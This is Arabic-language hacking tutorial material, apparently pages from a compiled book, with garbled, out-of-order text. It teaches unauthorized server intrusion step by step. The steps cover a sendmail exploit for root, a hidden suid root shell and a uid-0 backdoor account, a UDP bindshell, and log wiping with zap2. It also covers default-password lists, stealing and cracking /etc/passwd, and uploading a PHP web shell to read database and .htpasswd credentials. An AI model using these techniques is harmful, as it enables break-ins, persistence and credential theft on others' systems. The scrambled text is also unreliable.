ياد يا ايسر ؟؟؟؟‬ ‫هاك اتاك =| !!!!!!‬ ‫اسف نسيت ‪(= .‬انت لو كتبت ‪ exit‬حتطلع بره السيرفير ده و تعود للشيل بتاعك و عشان ترجع تاني يلزمك‬ ‫نفس الخطوات‬ ‫و في هذه الفتره قد يحتمل ان يكون الدمين قد قام بتغيير الباسورد او ركب باتش للديمون المصاب او قام‬ ‫بعمل اب جريد له‬ ‫مما يؤدي ان تفشل الكسبلويت في عملها ‪..03$.....‬ماذا بعد ؟؟؟فعل انت في امكانك ان تقوم بتغير الموقع او‬ ‫الصفحه الرئيسيه‬ ‫كل ما عليك ان تبحث عن الندكس في اي مكان او باستخدام المر فايند ‪..‬‬ ‫فاغلب الهاكرز بامكانهم اختراق هذه الدومينات‬ ‫و لكن انصحك جديا بتغيير الصفحه الرئيسيه في موقع محترم مثل‬ ‫‪microsoft.‬و انما تديك بس شيل هنال‬ ‫لذلك يجب عليك ن تقوم برفع اكسبلةيت اخر لوكل ‪local‬‬ ‫للحصول على الرروت في النظام‪../exploit 25 target..03$ gcc exploit....11 exploit‬‬ ‫‪usage: ./exploit‬‬ ‫‪This is a sendmail 8..com .c‬‬ ‫و هي تعمل بفر اوفر فلو ‪ .03‬‬ ‫طيب لو عندنا اكسبلويت للسند ميل اسمها ‪exploit.‬اي تي سي =<‬ ‫وضع باك دور ‪-:‬‬‫جميل ‪ .‬معنها اننا اخدنا شيل هناك‬ ‫تعال نشوف وضعنا ايه على السيرفير ‪:‬‬ ‫‪whoami$‬‬ ‫‪root‬‬ ‫يا عيني ‪.‬صعب ان النورتون يكشفه و ممك‪..‫‪.‬‬ ‫لكن هذا بصراحه و من غير زعل ‪.edu‬‬ ‫جميل جميل ‪$.‬كده انا بقيت رووت =(‬ ‫طيب فيه العديد من الكسبلويتت مش بتخليك رووت على السيستم‪..‬اذن نركب باك دوور يسمح لنا بالعوده بعد ذلك في‬ ‫اي وقت ‪.‬تذكر ن تحاول ان تتجنب رفع الكسبلويتات بالف تي بي على قدر‬ ‫المستطاع)احنا عايزينك =((‬ ‫فيه اكسبلويتات اخرى تعطيك صلحيه اظهار ملف الباسورد‪.....‬‬ ‫اذن حنعمل ايه دلوقتي؟؟‬ ‫في حاجه ‪.‬ده شغل اللمرز لن عيب اوي انك تفرد عضلتك على موقع ‪edu.

.03$ cp /bin/sh /dev/nul‬‬ ‫هههههه‬ ‫في اغلب الحيان الدمين ل ينظر داخل الدايركتوري ‪ .03$ /dev/nul‬‬ ‫‪sh-2. dev‬و لو حصل و نظر دخله فانه لن يشعر بشيء‬ ‫غريب لن فيه ملف اساسا اسمه ‪null‬‬ ‫=‪ D‬ل ده احنا عيال جدعان اوي =‪D‬‬ ‫‪sh-2.03$ whoami‬‬ ‫‪root‬‬ ‫احنا سوبر يوزرز الن بكل سهوله =(‬ ‫فيه مشكله ‪ ..‬في كثير من الشيلز تمنع اعطاء صلحيات ال ‪ suid‬يعني مينفعش نحصل على ال ‪sushi‬‬ ‫و في هذه الحاله يلزمنا ان نرفع للسيرفير المخترق شيل خاص تاني اسمه ‪ sash‬و هو اختصار ل ‪A‬‬ ‫‪stand-alone shell‬‬ ‫ذو اوامر خاصه به ‪.03$ exit‬‬ ‫بعد ‪ 80‬يوم لو رجعنا =‪ D‬تعال نشوف كده اللي حيحصل ‪:‬‬ ‫‪sh-2..‬‬ ‫و هو يسمح باعطاء صلحيات ال ‪ suid‬ل ‪ bin/sh/‬اذن نقدر نعمل الن ال ‪sushi‬‬ ‫‪ -2‬كيف نضيف يوزرز مزورين ؟؟‬ ‫طبعا انت رووت و تقدر تعمل تغيير في الملف ‪ etc/passwd/‬و ممكن من خلل الملف ده انك تضيف اي‬ ‫حد انت عايزه‬ ‫باستعمال المحرر ‪-: vi‬‬ ‫‪sh-2..03$ chown root nul‬‬ ‫نعطي الشيل الصلحيات اللي احنا عايزينها ‪-:‬‬ ‫‪sh-2..03$ chmod 4775 nul‬‬ ‫‪ 4775‬معناها ال ‪ suid‬اللي احنا عايزينها ‪.‬خليك مع المر الول بيعمل‬ ‫في كله ‪..03$ su dood‬‬ ‫‪sh-2.03$ cd /dev‬‬ ‫‪sh-2.03$ whoami‬‬ ‫‪luser‬‬ ‫‪sh-2.03$ whoami‬‬ ‫‪dood‬‬ ‫‪248‬‬ .‬تعالى نطلع بره كده و نشوف‬ ‫‪sh-2.‬‬ ‫خلي بالك ان المر ‪ chmod +s nul‬ممكن ميشتغلش في بعض النظمه ‪ .‫لكي تقوم بعمل ‪ sushi‬او ‪ suid shell‬يلزمك ان تقوم بنسخ ال ‪bin/sh/‬‬ ‫الى مكان خفي و نقوم باعطاءه صلحيات ال ‪ suid‬كالتالي ‪:‬‬ ‫‪sh-2.‬‬ ‫كده خلصنا مهمتنا ‪.03$ vi /etc/passwd‬‬ ‫طبعا لزم يكون عندك فكره عن كيفيه استخدام المحرر ‪vi‬‬ ‫في الملف ده حتلقي سطر لكل يوزر عادي يكون على الشكل ده‬ ‫‪luser:passwd:uid:gid:startdir:shell‬‬ ‫في حاله السوبر يوزرز بيكون ال ‪uid & gid =0‬‬ ‫اذن اضف السطر ده ‪:‬‬ ‫‪dood::0:0:dood:/:/bin/sh‬‬ ‫و كده اانت ضفت سوبر يوزر للنظام‬ ‫‪sh-2..

‬‬ ‫و بالهنا و الشفا =(‬ ‫المعلومات دي موجوده في المناطق دي‬ ‫‪usr/adm/lastlog/‬‬ ‫‪var/adm/lastlog/‬‬ ‫‪var/log/lastlog/‬‬ ‫يمكنك مسحهم باستخدام ‪ lled‬و دي ممكن تلقيها في اي موقع مهتم ‪.‬‬ ‫الطريف و الشيق في الموضوع انه الدمين لما ييجي يعمل سكان على الجهاز بتاعه للتامين عاده و في اغلب‬ ‫الحيان السكن يكون‬ ‫على منافذ ال ‪ TCP‬و نادرا جدا ان يعمل سكان على منافذ بروتوكول ‪UDP‬‬ ‫ عمليه ازاله الثار ‪-:‬‬‫في نظاام اليونيكس ‪.‬ليه لن الخ ‪ dood‬كل من ال ‪ gid‬و ال ‪ uid‬يساوي صفر‬ ‫‪ -3‬كيف تضع ‪ bindshell‬؟‬ ‫‪ bindshell‬عباره عن ديمون شبيه جد بال ‪ telnetd‬في الحقيقه التلنت ديمون عباره عن بايند شيل ‪..<Last login: Sun Sep 24 10:32:14 from <yourIPaddress‬‬ ‫و طبعا سيادتك كده حتتكشف‬ ‫لن اليوزر ده لو كان ناصح حيبعت ايميل للدمين و يقوله و يبلغه باللي حصل‬ ‫و طبع الدمين في الحال حيبعتله رساله و يقوله ‪-:‬‬ ‫متخافش يا واد ده واحد دخل على الحساب بتاعك و الي بي بتاعه موجوود ‪ ..‬‬ ‫بيكون معاه ملف للمساعده اقراه لكي تعرف طريقه الستخدام ‪./zap2 luser‬‬ ‫‪!Zap2‬‬ ‫‪sh-2..‬‬ ‫في حاله استخدام ‪ ftp‬لرفع الدوات يتخلف عن ذلك معلومات ايضا يمكنك ازالتها‬ ‫باستخدام ‪ wted‬و هو شبيه بالده السابقه ‪lled‬‬ ‫ماذا لو طبقنا المر ‪ who‬و لقينا معانا الرووت ؟؟‬ ‫‪sh-2....03$‬‬ ‫كلمه اخيره ‪:‬‬ ‫‪249‬‬ .03$ .03$ who‬‬ ‫‪Sep 25 18:18‬‬ ‫‪tty1‬‬ ‫‪root‬‬ ‫ممكن في الحاله دي نستخدم ‪zap2‬‬ ‫لو اسمك ‪: luser‬‬ ‫‪sh-2..‬فنكا ترى رساله عند اول الدخول تعلمك باخر مره‬ ‫قمت بها بالدخول و رقم الي بي الذي دخلت منه ‪.‬‬ ‫يعني سيادتك لو دخلت باسم يوزر و بعد كده اليوزر ده دخل حيلقي الرساله دي‬ ‫‪.‬عندما تقوم بالدخول الى حسابك ‪ ....‬و ن ان شاء ال‬ ‫حاتصل بمزود الخدمه في المنطقه و اساله عن رقم التلفون و ان شاء ابلغ البوليس ‪.‫طبعا احنا رووت ‪..03$ who‬‬ ‫‪sh-2.‬‬ ‫البايند شيل هذا يقوم بفتح بورت او منفذ يعني و لكنه ليس منفذ ‪ TCP‬بل منفذ ‪UDP‬‬ ‫و طبعا بيعطيك شيل عند التصال بهذا البورت ‪.

.‬‬ ‫انتهى‪،،،‬‬ ‫" درس اخر في اختراق المواقع عن طريق لينكس "‬ ‫>ةةةةة ةة ةةةةة ةةةة ةةةةةة<‬ ‫>ةةةةةة‪ :‬ةةة ةةة <‬ ‫اختراق لينكس‪.‬‬ ‫و أنا كالعادة لست مسؤول عن أي تصرف غبي أو أحمق يقوم به أي شخص و هذه المعلومات للعرض و‬ ‫زيادة المعرفة الشخصية‬ ‫في هذا القسم أقوم بشرح الخطوات الساسية للقيام بعملية اختراق و تخريب على الشبكة فإذا كان لديك أية‬ ‫معلومات أو شروح تود نشرها في هذا القسم الرجاء القيام بإرسالها لنا‬ ‫الـــهـــكـــر‬ ‫نحن هنا في حاجة إلى خلفية بسيطة قبل الخول في التعقيدات‬ ‫‪250‬‬ .‫هذا الموضوع هو عباره عن نبذه بسيطه للمبتدئين يمكنهم من البدايه بدايه موفقه باذن ال ‪.‬‬ ‫اتمنى ان يحوز على رضاكم‪...

com‬مزود خدمات على النترنت‬ ‫الذي سيقوم بإعطائه ‪:‬‬ ‫اسم مستخدم و هو التعريف لمجلد راشد على الشبكة‬ ‫كلمة مرور و هي مفتاحه للدخول إلى مجلده و قسمه‬ ‫و هذان هما السبيل للوصول إلى جميع الخدمات المتاحة لراشد‬ ‫و سوف نركز على الوصول إلى اللب والصل‬ ‫هناك طريقتان رئيستان للدخول إلى نظام الولى تتمثل في الحصول على خليط من كلمة سر و اسم مستخدم و‬ ‫هي بطيئة و نادرة وأما الطريقة الثانية فهي استغلل مناطق ضعف الخادم و التسلل من خللها‬ ‫إن التخريب ممنوع و لنه من السهل مطاردتك إن إكتشاف محولتك للختراق عن طريق الي بي أدرس فهو‬ ‫رقم تعريفك على الشبكة و الحل هو أن تقوم بإعطاء بينات خاطئة لمزود خدمات شبكتك‬ ‫يستخدم المخترقون أدوات لسرقة الرقم السري و اسم المستخم من الماكن العامة مثل مقاهي النترنت و هذا‬ ‫أحد البرامج‬ ‫قم بتغيير البروكسي و هذا هو السهل أو التسجيل ببيانات و همية لموقع يضمن لك التصفح بخصوصية و قم‬ ‫بتعطيل خدمة ‪ Caller ID‬إذا كانت تعمل‬ ‫نحن الن نأخذ الخطوة الولى لي عملية هكر ‪..‫إن قول اختراق أو تخريب يعني الحصول على صلحيات على سيرفرات الشبكات ل يسمح لنا بالحصول عليها‬ ‫في الحوال العادية فخوادم الشبكات معدة لستقبال العديد من الناس و لكل فرد منهم حساب على الشبكة‬ ‫فالنفترض أن لراشد حساب على الفريسرفرز‬ ‫‪ FreeServers.org‬‬ ‫قم بفحص الموقع و تسجيل أي إيميل موجود و قم بنسخ ‪ html‬لي صفحة مهمة‬ ‫قم بإرسال و همي لهم أقصد إيميل غير موجود مثل‬ ‫‪@Blahblahblah‬اسم الموقع‬ ‫و ينصح بإرساله من موقع بريد مجاني واستخدام جميع امكانياته المهم سيأتيك إيميل بسبب عدم جود البريد‬ ‫المرسل إليه و معه بعض المعلومات الموجوده في ‪ header‬الرسالة‬ ‫أنت الن في حاجة إلى أدوات تعقب لمعرفة بعض المعلومات عن المزود للخادم الضحية‬ ‫أول ستحتاج إلى الي بي ‪ IP‬و ثانيا خدمة التعريف ‪ Whois‬لتحصل عن معلومات عنه‬ ‫الذي سيعطيك معلومات عن مالكي الموقع و نوع السيرفر عليه و قم بتسجيلها‬ ‫‪251‬‬ ..‬جمع المعلومات‬ ‫لبد أنك جاهز الن قم بتشغيل ‪ notepade‬ونافذة متصفح جديد من خلل محطم أي بي أو أي موقع آخر‬ ‫مثل‬ ‫‪Hakkerz.ml.home.

org‬المهم فلنتابع حديثنا قم بفتح نافذة ‪ telnet‬و غير المنفذ إلى ‪ 23‬و إذا كان‬ ‫الموقع يبدأ ب ‪ www‬فجرب ذلك بدونها فإن لم يقم بإعطائك بينات فجرب إضافة ‪telnet.Victim.ml.com‬‬ ‫كلمة ‪ telnet‬كما ترى مكان ‪ www‬و إذا لم ينجح جرب أي من مواقع السرفرات التي حصلنا عليها من‬ ‫‪ whois‬و بمجرد نجاحك في الدخول قم بتسجيل أية بيانات تحتاجها و بالتحديد نوع السيرفر‬ ‫الن قم بتغيير المنفذ إلى ‪ 21‬و الن سيأخذك إلى منفذ ال ‪ ftp‬فإن حصل ذلك جرب كتابة‬ ‫‪ SYST‬لتعرف نوع السيرفر الن إذا كنت محظوظا جرب المنفذ ‪ 80‬الذي يعد منفذ ال ‪ http‬وسجل أي‬ ‫بينات و أهمها على الطلق نوع السيرفر فإذا لم تنجح بعد ذلك كله جرب برنامج يدعى ‪Whats‬‬ ‫‪ ?Running‬و قد يعمل و لكن سيرفر الضحية سيسجل ذلك‬ ‫و كما ذكرت في البداية هناك طريقتان استخدام البرامج أو ايجاد الباسوورد و لنجرب الن الباسوورد الذي‬ ‫ستحصل عليه باستخدام‬ ‫‪Login: root$‬‬ ‫‪Password: root$‬‬ ‫فلنقم بتجربة هذا أول حيث أن برامج ‪ linux‬تأتي محملة بعدد من الباسوورد الجاهزة و هي غالبا تبقى كما‬ ‫هي لذلك عليك القيام باتصال باستخدام ‪ telnet‬و الذي هو من الموقع سالف الذكر و ل تستخدم البرنامج‬ ‫العادي الموجود على جهازك وقم بتجربة الباسوورد و اسماء المستخدمين التالية‬ ‫‪ACCOUNT: PASSWORD‬‬ ‫)‪login) root: (password) root‬‬ ‫‪sys: sys / system / bin‬‬ ‫‪bin: sys / bin‬‬ ‫‪mountfsys: mountfsys‬‬ ‫‪adm: adm‬‬ ‫‪uucp: uucp‬‬ ‫‪nuucp: anon‬‬ ‫‪anon: anon‬‬ ‫‪user: user‬‬ ‫‪games: games‬‬ ‫‪install: install‬‬ ‫‪252‬‬ .‫الن عليك باستخدام خاصية ‪ finger‬جرب أول‬ ‫اسم الموقع ‪@Finger‬‬ ‫و إذا لم يقم بإعطائك معلومات التي قد تكون مفيدة جرب ايميل من التي حصلنا عليها في العلى‬ ‫الن عليك القيام بفحص المنافذ ‪ scan ports‬للي بي ‪ IP‬الذي حصلنا عليه لكي تعرف المنافذ المفتوحة‬ ‫و الخدمات التي يدعمها الموقع و هناك برامج جيدة لذلك و معظمها لنظمة ‪Linux /Unix systems‬‬ ‫و هذا البرنامج ‪ Exploit Generator‬خاص بأنظمة ويندوز على الشبكات‬ ‫و إن كنت ستخترق موقع شديد الحراسة فدعنا ننسى تفحص المنافذ لمدة لن هذا العمل غير شرعي و قد يتم‬ ‫الكشف عنه إل إذا ما كنت تمتلك نظام ‪ linux‬ما يهمنا من ذلك أنه إذا كان المنفذ ‪ 21‬مفتوحا فيعني ذلك‬ ‫أنهم يدعمون ‪ FTP‬و إن كان ‪ 23‬فذلك أنهم يملكون ‪TelNet‬‬ ‫‪ Telnet‬الهدف من ذلك هو معرفة نوع السيرفر و أنت في وضع ‪ Anonymous‬في متصفحك و على‬ ‫العموم للقيام بكل تلك المور سالفة الذكر ستجد ما تحتاجه في الموقع التالي حتى ل تتعب في البحث‬ ‫‪ hakkerz.home.

net‬أو ‪ /ftp://ftp.hakkerz.net‬و إن لم يعمل أي منها قم بتجربة أي مواقع ‪ ftp‬كانت‬ ‫موجودة في البيانات المعطاة من ‪ whois‬فالنفترض أنك نجحت في الدخول اضغط على مجلد \‪ etc‬و الن‬ ‫ستر ملف ‪ passwd‬قم بتنزيله على جهازك وقم بفتحه و إن كان على الشكل التالي فأنت محظوظ‬ ‫‪root:2fkbNba29uWys:0:1:Operator:/:/bin/csh‬‬ ‫‪admin:rYsKMjnvRppro:100:11:WWW‬‬ ‫‪administrator:/home/Common/WWW:/bin/csh‬‬ ‫‪kangaroo:3A62i9qr:1012:10:Hisaharu‬‬ ‫]‪[.ml.5‬و الذي يحتاج إلى ملفات كلمات كثيرة‪.org‬سنعيد‬ ‫الكرة ثانية بل إن عملنا السابق و القادم يعتمد على اخفاء الي بي و قم بالتجربة عن طريق الشكل التالي‬ ‫مثل‬ ‫‪ ftp:// abc.‫‪demo: demo‬‬ ‫‪umountfsys: umountfsys‬‬ ‫‪sync: sync‬‬ ‫‪admin: admin‬‬ ‫‪guest: guest‬‬ ‫‪daemon: daemon‬‬ ‫و إذا لم تصلح فإن هناك العديد من الناس الغبياء الذين يستخدمون أسماء الدخول كباسوورد قم بتجربة‬ ‫الشق الول من البريد اللكتروني كإسم مستخدم و كذلك كباسوورد أو من البيانات التي حصلت عليها من‬ ‫‪ whois‬و أن كنت تعيس الحظ إلى الن قم بالتجربة التالية على افتراض أنك تحاول الدخول إلى نظام ‪unix‬‬ ‫فإنك لربما تتساءل كيف يتعرف النظام إلى الباسوورد و الجواب أن هناك ملف يدعى ‪ passwd‬لذلك علينا‬ ‫المحاولة للوصول إليه و إحدى الطرق القديمة هي استخدام ال ‪ ftp‬و الذي سندخل إليه باستخدام نافذة‬ ‫المتصفح و في نظري ‪ internet explorer‬ينفع في هذه الحالة و لكن عليك أن تكون غير معرف لهم و‬ ‫كما فتحنا النافذة سابقا باستخدام ‪ IP jammer‬الموجود في موقع ‪ .‬‬ ‫انتهى‪،،،‬‬ ‫‪253‬‬ .home.abc.etc‬‬ ‫و هنا ترى اسم المستخدم و هو ‪ kangaroo‬و تشفير الباسوورد وليس هي هو ‪ 3a62i9qr‬أو سيكون‬ ‫المنظر فوق أشبه بالتالي‬ ‫‪root:*:0:1:Operator:/:/bin/csh‬‬ ‫‪admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh‬‬ ‫‪kangaroo:*:1012:10:Hisaharu‬‬ ‫‪TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh‬‬ ‫و هنا كما تشاهد فإن الباسوورد المشفرة استعيض عنها بباسوورد يصعب فك تشفيرها و هو‬ ‫*’‪ s‬أو ‪ ?x’s‬و إن حصلت على النوع في العلى فإن هناك برامج مخصصة لملفات الباسوورد ليونكس و‬ ‫فك تشريرها مثل ‪ John the Ripper 1.

‫" درس عن الـ ‪) PHP Shell‬الجزء الول( "‬ ‫>منقول من موقع ‪< pharaonics‬‬ ‫>الكاتب‪> Arab VieruZ:‬‬ ‫موضوع للبي اتش بي شل يشرح الطرق والخداع المستخدمة و اوامر لينكس‬ ‫السلم عليكم‪...‬‬ ‫البي اتش بي شيل ملف يرعب كل صاحب موقع على سيرفر وحله اسهل مما يمكن‬ ‫ل فسمحولي ‪(:‬‬ ‫الموضوع بسيط جدًا لكن سأطوله قلي ً‬ ‫اوًل ‪:‬‬ ‫راجع الوصلة التالية‬ ‫ثانيًا ‪:‬‬ ‫‪254‬‬ .

‫الن وبعد قراءتك الموضوع كامل اتوقع منك معرفة ما هو الـ ‪PHP Shell‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الول ‪:‬‬ ‫اوامر لينكس‬ ‫*‪*-----------------------------------------------‬‬ ‫امر سرد الملفات ‪ls -a :‬‬ ‫سرد جميع الملفات المخفية او غيرها‬ ‫*‪*-----------------------------------------------‬‬ ‫امر عرض محتويات الملف ‪ cat -e :‬او ‪cat‬‬ ‫فتح الملف وعرض محتوياته‬ ‫*‪*-----------------------------------------------‬‬ ‫امر حذف الملف ‪rm -f :‬‬ ‫لحذف الملف الذي تريد‬ ‫*‪*-----------------------------------------------‬‬ ‫امر حذف المجلد ‪rm -d :‬‬ ‫لحذف المجلد الذي تريد‬ ‫*‪*-----------------------------------------------‬‬ ‫امر النسخ ‪cp -i :‬‬ ‫لنسخ الملف الذي تريد‬ ‫*‪*-----------------------------------------------‬‬ ‫امر اعادة التسمية ‪mv :‬‬ ‫لعادة التسمية‬ ‫*‪*-----------------------------------------------‬‬ ‫ملحظة ‪ :‬لمعرف المزيد من اوامر لينكس قم بشراء الكتب وللحصول على‬ ‫معلومات اكثر لمر من الوامر كم بوضع المر ثم ‪help--‬‬ ‫‪255‬‬ .

‫مثال ‪ls --help :‬‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الثاني ‪:‬‬ ‫كيفية تنفيذ الوامر ‪:‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪256‬‬ .

txt‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -2‬لنفرض اننا نريد اختراق موقع معين وكان صاحب الموقع ذكي جدًا وحريص‬ ‫هذي طريقه قد تنفع اوًل تحديد الشركة المستضيفة و نحاول البحث عن مواقع‬ ‫في نفس السيرفر او على القل في نفس شركة الستضافة يكون صاحبها دلخ‬ ‫ونحاول نلقى ثغرة نحمل منها الملف‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -3‬المواقع المجانية التي تدعم البي اتش بي‪.‫‪ -1‬ستجد مربع للكتابة قم بكتابة المر المراد تنفيذه‬ ‫‪ -2‬هنا تعرض الملفات والمجلدات‬ ‫‪ -3‬هنا تعرض المجلدات فقط‬ ‫‪ -4‬مكان الفلودر الذي تعمل عليه الن‬ ‫‪ -5‬ضع العلمة ليخبرك ما يحدث عند وجود خطأ‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الثالث ‪:‬‬ ‫الخدع والطرق لتحميل هذا الملف ‪:‬‬ ‫*‪*-----------------------------------------------‬‬ ‫هنا تأتي المشكله !!!‬ ‫لكن ليست مستحيله وسنستعرض بعض الطرق التي اتبعها انا شخصيًا‬ ‫‪ -1‬ايجاد ثغرة تستطيع منها تحميل الملف‬ ‫مثال ‪ :‬ثغرة النوك القديمة حقت الـ ‪hacked.‬‬ ‫انتهى‪،،،‬‬ ‫‪257‬‬ .

‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -1‬اخذ الباس من ملفات اكسس الـ ‪ My SQL‬التي تسمى بالعادة ‪config.php‬‬ ‫وسيظهر الباسورد في احد المتغيرات‬ ‫‪258‬‬ .php‬‬ ‫ويمكن اخذ الباس عن طريق تنفيذ المر التالي في الـ ‪PHP Shell‬‬ ‫الذهاب الى المجلد الذي يوجد فيه هذا الملف وكتابة المر التالي‬ ‫‪cat config.‫" درس عن الـ ‪) PHP Shell‬الجزء الثاني( "‬ ‫>ةةةةة ةة موقع ‪< pharaonics‬‬ ‫>ةةةةةة‪> Arab VieruZ:‬‬ ‫نتابع الموضوع مباشره‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الرابع ‪:‬‬ ‫طرق الحصول على الباسورد‪:‬‬ ‫*‪*-----------------------------------------------‬‬ ‫هذا الجزء سيأخذ موضوع الـ ‪PHP Shell 2‬‬ ‫طرق الحصول على الباسورد هي من اصعب الطرق التي قد تواجه المخترق ‪.

pwd‬‬ ‫وهو تابع للفرونت بيج ويوجد به الباسورد الخاص بالفرونت بيج مشفر ‪DES‬‬ ‫ويوجد داخل مجلد ‪:‬‬ ‫_‪vti_pvt‬‬ ‫المر ‪cat /home/site/www/_vti_pvt/service.‫*‪*-----------------------------------------------‬‬ ‫‪ -2‬اخذ الباس المشفر من ملف الـ ‪htpasswed.pwd :‬‬ ‫رابط ‪ :‬راجع درس ‪ DeXXa‬الخاص بهذا القسم‬ ‫‪user:nymw4oS3oerdY‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -4‬ل يمكن اعتبارها كقسم لكن كملحظة ال وهي ‪:‬‬ ‫ان بعض المواقع تتحد في سكربتات مثل الـ ‪phpMyAdmin‬‬ ‫ويكون لكن موقع اكسس خاص لدخول هذا السكربت‬ ‫ويكون بملف الـ ‪ config.‬حتى تجد مكان الملف السابق‬ ‫مثال ‪/home/site/.htpasswds/forum/admin/passwd :‬‬ ‫المر ‪cat /home/site/.htpasswds/forum/admin/passwd :‬‬ ‫ستجد الباس المشفر بتشفير ‪ DES‬يعني تقدر تفكه بجون ذا رايبر‬ ‫‪user:nymw4oS3oerdY‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -3‬طريقة الكستينشون سيرفر او ‪: service.‬‬ ‫ويمكن اجاد هذا الملف في احد مجلدات السيرفر واذا لم تجده قم بفتح‬ ‫الـ ‪ htaccess.php‬يكون الروت للقاعدة‬ ‫يعني يمكن تعدل وتمسح اي قاعدة لي موقع كان !!‬ ‫انتهى‪،،،‬‬ ‫‪259‬‬ .

‫" درس عن الـ ‪) PHP Shell‬الجزء الثالث( "‬ ‫>ةةةةة ةة موقع ‪< pharaonics‬‬ ‫>ةةةةةة‪> Arab VieruZ:‬‬ ‫الجزء الخامس و الخير من هذا الدرس‬ ‫بما انك الن عرفت معظم الشياء لكن لبد من وجود مشاكل سأذكر الذي اصابني‬ ‫*‪*-----------------------------------‬‬ ‫‪ -1‬مشكلة عرض المواقع الخرى ‪:‬‬ ‫جميع المواقع الموجودة في السيرفر في ‪:‬‬ ‫‪home/‬‬ ‫المر ‪ :‬قم بالذهاب الى مجلد الروت ‪/‬‬ ‫‪ls -a /home‬‬ ‫ستجد مجلدات كل مجلد يحوي ملفات موقع ما لعرضه‬ ‫‪ls -a /home/SITE‬‬ ‫‪ = SITE‬اسم الموقع او المجلد‬ ‫*‪*-----------------------------------‬‬ ‫‪ -2‬مشكلة عرض ملفات الموقع ‪:‬‬ ‫بعض السيرفرات ل تسمح بدخول ‪ home‬الموقع ال اذا كنت انت روت او صاحب الموقع‬ ‫الحل ‪:‬‬ ‫‪260‬‬ .

‫قم بدخول ‪:‬‬ ‫‪/home/site/public_html‬‬ ‫او‬ ‫‪/home/site/www‬‬ ‫لدخول الى ملفات الموقع التي تعرض‬ ‫*‪*-----------------------------------‬‬ ‫‪ -3‬بعض الوامر ل تعمل‬ ‫هذه مشكله من الصعب حلها ويجب استعمال باك دور خاص بكرنل السيرفر‬ ‫اقصد اصدار الكرنل‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪261‬‬ .

‬وتدعم النماب‬ ‫عدد كبير من تقنيات المسح مثل ‪:‬‬ ‫‪UDP‬‬ ‫‪()TCP connect‬‬ ‫‪(TCP SYN (half open‬‬ ‫‪(ftp proxy (bounceattack‬‬ ‫‪Reverse-ident‬‬ ‫‪(ICMP (ping sweep‬‬ ‫‪FIN‬‬ ‫‪ACK sweep‬‬ ‫‪Xmas Tree‬‬ ‫‪SYN sweep‬‬ ‫‪.nmap‬أداة كشف عن الشبكات و ماسح أمني‬ ‫الخلصة ‪:‬‬ ‫أنواع المسح ‪ -‬الخيارات‬ ‫الوصف ‪:‬‬ ‫صمم هذا البرنامج لكي يسمح لمدراء النظام و الفراد بمسح شبكات كبيرة‬ ‫لتقرير و معرفة المضيفين وماذا يقدمون من خدمات ‪ .‫" شرح أداة ‪" anmap‬‬ ‫>ةةةةة<‬ ‫>ةةةةة ةةةةةة‪ :‬ةةةةة ةةةةةة<‬ ‫السم ‪:‬‬ ‫‪ .‬مثل‪:‬‬ ‫‪remote OS detection via TCP/IP fingerprinting‬‬ ‫‪stealth scanning‬‬ ‫‪dynamic delay and retransmission calculations‬‬ ‫‪parallel scanning‬‬ ‫‪262‬‬ .and Null scan‬‬ ‫النماب تقدم أيضًا عدد من المميزات المتقدمة ‪ ..

‫‪detection of down hosts via parallel pings‬‬
‫‪decoy scanning port‬‬
‫‪filtering detection‬‬
‫‪direct (non-portmapper) RPC scanning‬‬
‫‪fragmentation scanning‬‬
‫‪flexible target and port specification‬‬
‫نتائج النماب عادةًا ماتكون على هيئة قائمة بالبورتات المهمه التي توجد‬
‫في اللة التي أجريت عليها عملية المسح ‪ .‬والنماب دائمًا يعطينا البورتات وإسم الخدمة والعدد والحالة‬
‫والبروتوكول‬
‫الحاله إما أن تكون مفتوحة او مرشحة أو غير مرشحة‬
‫مفتوحة تعني أن اللة سوف تقبل أي إتصال بهذا البورت‬
‫المرشحة تعني أن هناك فايروول أو فلتر )مرشح( أو أي عقبة أخرى تغطي هذا البورت وتمنع النماب من‬
‫معرفة حالة البورت إذا كان مفتوحًا أو ل‬
‫غير مرشح تعني بأن هذا البورت معروف لدى النماب بأنه مغلق‬
‫ول يبدو أن أي فايروول أو فلتر )مرشح( تدخل في محاولة النماب‬
‫والبورتات غير المرشحة هي أغلب الحالت ول يمكن معرفتهم إل في حالة واحدة ‪ ،‬هي أن يكون معظم‬
‫البورتات‬
‫التي أجريت لهم عملة المسح في حالة ترشيح‬
‫وبالعتماد على الخيارات المستخدمه في النماب فيمكن أن يبلغ عن الحالت المميزة التالية في الريموت‬
‫هوست ‪:‬‬
‫النظام المستخدم‬
‫‪TCP sequencability‬‬
‫أسماء المستخدمين الذين يشغلون البرامج المرتبطة بكل بورت‬
‫أسماء الدي إن إس‬
‫وبعض الشياء الخرى‪.‬‬

‫انتهى‪،،،‬‬

‫‪263‬‬

‫" طريقة لقتحام السيرفرات بدون ثغرات "‬
‫>منقول من منتديات شبكة الحزم السلمية<‬
‫>الكاتب‪<network access :‬‬
‫استخدام الثغرات انا بصراحه ماشوف فيه اي فن ول علم بصراحه انت تستخدم شي جاهز وهذي وجه نظري‬
‫يعني ماتحس انك تسوي شي متعب ياخذ منك جهد ووقت‬
‫لكن في طرق كثيره جدا غير استخدام الثغرات ويمكن كل واحد له طريقته واسلوبه حتى في استغلل الثغرات‬
‫لكن بما انك انسان يفترض انك هاكر وتشوف نفسك متمكن اعتقد مسئله اقتحام سيرفر او موقع ماراح‬
‫تربطها بوقت وزمان يعني ممكن الواحد يجلس يحاول لمده شهر شهرين ثلثه وكل مره يفشل الين يقدر‬
‫يوصل في الخير لنتيجه وعلى الساس هذا انا كتبت الموضوع هذا الي انشال اتمنى انه يكون مفيد وينفعنا‬
‫ال فيه‬
